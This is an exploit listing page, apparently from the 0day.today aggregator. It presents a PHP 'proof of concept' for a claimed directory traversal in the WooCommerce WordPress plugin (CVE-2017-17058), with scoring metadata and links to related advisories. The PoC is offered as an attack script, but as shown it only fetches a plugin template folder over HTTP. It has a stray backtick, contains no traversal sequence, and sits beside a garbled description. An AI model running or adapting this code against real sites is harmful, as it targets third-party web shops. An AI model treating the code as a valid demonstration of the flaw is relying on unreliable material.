Lucene search
Fu2x20001337DAY-ID-29088HistoryDec 01, 2017 - 12:00 a.m.
WordPress WooCommerce 2.0/3.0 Plugin - Directory Traversal Vulnerability
2017-12-0100:00:00
Fu2x2000
0day.today
52
EPSS
0.005
Percentile
76.5%
Exploit for php platform in category web applications
# Exploit Title: WordPress woocommerce directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: [emailΒ protected]
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps
1. Description
Identifying woo commerce theme pluging properly sanitized against Directory
Traversal,even the latest version of WordPress with woocommerce can be
vulnerable.
2. Proof of Concept
$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);
$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");
$result = file_get_contents_utf8("http://".$woo);
echo $result;
Regards
Fu2x200
# 0day.today [2018-04-11] #Related
cvelist
cvelist
CVE-2017-17058
2017-11-29 07:00:00
exploitdb
exploitdb
WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal
2017-11-28 00:00:00
seebug
seebug
WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal(CVE-2017-17058)
2017-12-01 00:00:00
prion
prion
Directory traversal
2017-11-29 07:29:00
cve
cve
CVE-2017-17058
2017-11-29 07:29:00
packetstorm
packetstorm
WordPress WooCommerce 2.0 / 3.0 Directory Traversal
2017-11-30 00:00:00
nvd
nvd
CVE-2017-17058
2017-11-29 07:29:00
vulnrichment
vulnrichment
CVE-2017-17058
2017-11-29 07:00:00